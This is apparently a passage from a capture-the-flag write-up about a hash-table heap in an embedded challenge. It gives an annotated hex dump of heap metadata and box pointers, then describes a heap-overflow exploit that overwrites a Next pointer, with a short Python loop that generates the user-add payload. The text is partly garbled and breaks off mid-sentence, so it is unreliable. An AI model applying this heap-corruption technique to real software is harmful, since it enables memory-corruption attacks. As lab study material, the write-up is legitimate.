Hash Table, plus one full box: 5000: 0050 1050 1500 0b00 0300 0500 1650 2c50 .P.P.........P,P 5010: 0050 2650 2100 4250 a250 0251 6251 c251 .P&P!.BP.P.QbQ.Q 5020: 2252 8252 e252 1050 3c50 2100 0b00 0000 "R.R.R.P+1) - 1) 04: 0005: Parameter 2 (Rightshift?) 06: 5016: & Box Pointer List 08: 502c: & Per-box User Count List Box Pointer List: Box list header metadata @ 5010: 0050 2650 2100 [ Prev: 5000, Next: 5026, Size: 0010 ] Data: 4250 a250 0251 6251 c251 2252 8252 e252 00: 5042 & Box 0 02: 50a2 & Box 1 04: 5102 & Box 2 06: 5162 & Box 3 08: 51c2 & Box 4 0a: 52c2 & Box 5 0c: 5282 & Box 6 0e: 52e2 & Box 7 Other Data Section (?) Section header metadata @ 5026: 1050 3c50 2100 [ Prev: 5010, Next: 503c, Size: 0010 ] Data: 0a00 0000 0000 0000 0000 0000 0000 0000 The Exploit: When an 11th user is added, the software will attempt to double the size of the heap. Overwriting a heap Next pointer allows us toAAAA for c in ['1', '9', 'A', 'I', 'Q', '0', '8', '@', 'H', 'P', 'AAAAAAAAAAAAAAAA', '']: print(f'new {c} ;',end="")